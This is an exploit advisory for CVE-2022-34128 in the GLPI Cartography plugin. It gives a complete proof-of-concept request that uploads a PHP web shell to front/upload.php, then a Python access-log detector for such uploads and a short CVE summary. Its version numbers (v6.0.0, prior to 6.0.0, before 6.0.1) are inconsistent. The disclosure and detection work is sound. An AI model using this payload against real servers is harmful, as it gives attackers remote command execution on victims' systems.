GLPI Cartography Shell Upload
GLPI Cartography versions prior to 6.0.0 suffer from a remote shell upload vulnerability.
# Exploit Title: GLPI Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution (RCE)
# Date found: 11 Jun 2022
# Application: GLPI Cartography < 6.0.0
# Author: Nuri Çilengir
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/InfotelGLPI/positions
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE: CVE-2022-34128

# PoC

POST /marketplace/positions/front/upload.php?name=poc.php HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 39
Origin: http://192.168.56.113
Connection: close

<?php echo system($_GET["cmd"]); ?>
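For defenders, the PoC above gives a clear detection signature: a POST to the plugin's front/upload.php whose name parameter carries a server-executable extension. The following detector is an added example, not part of the advisory or the plugin; the log lines are constructed, the log format is assumed to be the common combined access-log format, and the extension list is an assumption about what a typical PHP web server executes.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Extensions a typical PHP server executes (assumed list); any of them in an
# uploaded file name is treated as a web-shell upload attempt.
EXEC_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"}
UPLOAD_PATH = "/marketplace/positions/front/upload.php"

# Combined log format: client ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def exec_extensions(name):
    """Every executable extension in the name; also catches double extensions like poc.php.png."""
    parts = name.lower().split(".")[1:]
    return [p for p in parts if p in EXEC_EXTS]

def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    return {"client": m.group("client"), "time": m.group("time"),
            "method": m.group("method"), "path": url.path,
            "query": parse_qs(url.query), "status": int(m.group("status"))}

def detect_shell_uploads(lines):
    """Flag POSTs to the Cartography upload endpoint whose ?name= has an executable extension."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != UPLOAD_PATH:
            continue
        for name in rec["query"].get("name", []):
            exts = exec_extensions(name)
            if exts:  # benign image uploads (png, jpg) fall through
                findings.append({"client": rec["client"], "time": rec["time"],
                                 "name": name, "ext": exts[0], "status": rec["status"]})
    return findings

# Constructed sample log lines (not from the advisory); status 200 means the server accepted the upload.
SAMPLE_LOG = [
    '192.168.56.1 - - [11/Jun/2022:10:00:01 +0000] "POST /marketplace/positions/front/upload.php?name=poc.php HTTP/1.1" 200 12',
    '10.0.0.5 - - [11/Jun/2022:10:05:00 +0000] "POST /marketplace/positions/front/upload.php?name=floor1.png HTTP/1.1" 200 12',
    '10.0.0.5 - - [11/Jun/2022:10:05:03 +0000] "GET /marketplace/positions/front/index.php HTTP/1.1" 200 8831',
    '10.0.0.7 - - [11/Jun/2022:10:06:00 +0000] "POST /marketplace/positions/front/upload.php?name=map.phtml HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for f in detect_shell_uploads(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} uploaded {f['name']!r} (.{f['ext']}) status={f['status']}")
```

A hit with status 200 on an unpatched instance means the file was written, so the next step is to inspect the plugin's upload directory and treat the host as compromised until proven otherwise.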
Related news
CVE-2022-34128: Unauthenticated Remote Code Execution Due to Unrestricted File Upload
The Cartography (aka positions) plugin before 6.0.1 for GLPI allows remote code execution via PHP code in the POST data to front/upload.php.